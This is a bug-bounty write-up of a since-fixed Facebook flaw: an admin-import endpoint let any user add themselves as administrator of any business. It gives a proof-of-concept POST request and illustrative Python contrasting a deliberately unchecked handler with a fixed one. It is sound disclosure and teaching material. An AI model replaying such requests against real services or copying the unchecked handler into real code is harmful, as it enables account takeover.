Facebook Business Takeover

There is a call that imports admins into a business account. At the time of the report, the endpoint performed no authorization check on the caller: it never verified that the requesting user held any role in the target business. All it needed was the target's business ID, so it was possible to add oneself as an admin of any business.
Proof of Concept

POST /business/aymc_assets/admins/import/ HTTP/1.1
Host: facebook.com
Content-Type: application/x-www-form-urlencoded

business_id=TARGET_BUSINESS_ID&admin_id=MALICIOUS_USER_ID&session_id=SESSION_ID


This adds the user identified by admin_id to the business identified by business_id as an administrator, with no check that the caller already holds a role in that business.
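The missing check, modelled as an added example (illustrative code written for this page, not Facebook's code): a minimal in-memory version of the import endpoint as it behaved before the fix, beside a hardened version that refuses the request unless the caller is already an admin of the target business. All names (make_state, import_admin_vulnerable, import_admin_fixed, handle, the session and business IDs) are assumptions for the example, and POC_BODY is a constructed request body that mirrors the proof of concept above.

```python
"""Added example, not the original page's or Facebook's code.

Models a business admin-import endpoint that authenticates the caller but
never authorizes them against the target business (the bug described above),
next to a hardened handler that checks the caller's role on that business.
"""
from dataclasses import dataclass, field
from urllib.parse import parse_qs


class Forbidden(Exception):
    """Raised when a request must be rejected with 403."""


@dataclass
class Business:
    business_id: str
    admins: set = field(default_factory=set)


# Hypothetical session table: session_id -> user id.
VALID_SESSIONS = {"sess_attacker": "attacker", "sess_owner": "victim_owner"}

# Constructed request body mirroring the proof of concept: the attacker,
# who holds no role in business 1001, tries to import themselves as admin.
POC_BODY = "business_id=1001&admin_id=attacker&session_id=sess_attacker"


def make_state():
    """Fresh constructed sample state: the attacker only administers 2002."""
    return {
        "1001": Business("1001", {"victim_owner"}),
        "2002": Business("2002", {"attacker"}),
    }


def authenticate(session_id):
    """Authentication only: who is calling? Says nothing about what they may do."""
    try:
        return VALID_SESSIONS[session_id]
    except KeyError:
        raise Forbidden("invalid session")


def import_admin_vulnerable(state, business_id, admin_id, session_id):
    """Pre-fix behaviour: any authenticated caller can add any admin to any business.

    business_id comes straight from the request and is used to select the
    target without asking whether the caller has a role in it.
    """
    authenticate(session_id)
    business = state[business_id]
    business.admins.add(admin_id)
    return sorted(business.admins)


def import_admin_fixed(state, business_id, admin_id, session_id):
    """Hardened handler: the caller must already be an admin of business_id."""
    caller = authenticate(session_id)
    business = state.get(business_id)
    # Same error for an unknown business and for a missing role, so the
    # endpoint does not become an oracle for which business IDs exist.
    if business is None or caller not in business.admins:
        raise Forbidden("caller is not an administrator of this business")
    business.admins.add(admin_id)
    return sorted(business.admins)


def handle(handler, state, body):
    """Parse a form-encoded POST body and dispatch it to a handler.

    Returns (status, payload): 200 with the resulting admin list,
    403 with the rejection reason, or 400 for a malformed request.
    """
    params = {k: v[0] for k, v in parse_qs(body, strict_parsing=True).items()}
    try:
        args = (params["business_id"], params["admin_id"], params["session_id"])
    except KeyError as missing:
        return 400, f"missing parameter {missing.args[0]}"
    try:
        return 200, handler(state, *args)
    except Forbidden as err:
        return 403, str(err)


if __name__ == "__main__":
    print("vulnerable:", handle(import_admin_vulnerable, make_state(), POC_BODY))
    print("fixed:     ", handle(import_admin_fixed, make_state(), POC_BODY))
```

The vulnerable handler is a textbook broken-access-control case: authentication passes, so the request is not anonymous, but the object the request names (business_id) is never tied back to the caller's privileges. The fix is a per-object check on the business, not a stricter login.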
Impact
This could have let an attacker without an existing role take over any business account and gain access to the business assets connected to it (Facebook Pages, ad accounts, apps, Instagram accounts).
Timeline

  • Oct 9, 2018 – Report Sent
  • Oct 9, 2018 – Further investigation by Facebook
  • Oct 10, 2018 – Endpoint removed
  • Oct 15, 2018 – Confirmation of audit by Facebook
  • Oct 15, 2018 – Fixed by Facebook
  • Oct 17, 2018 – $27,500 bounty awarded by Facebook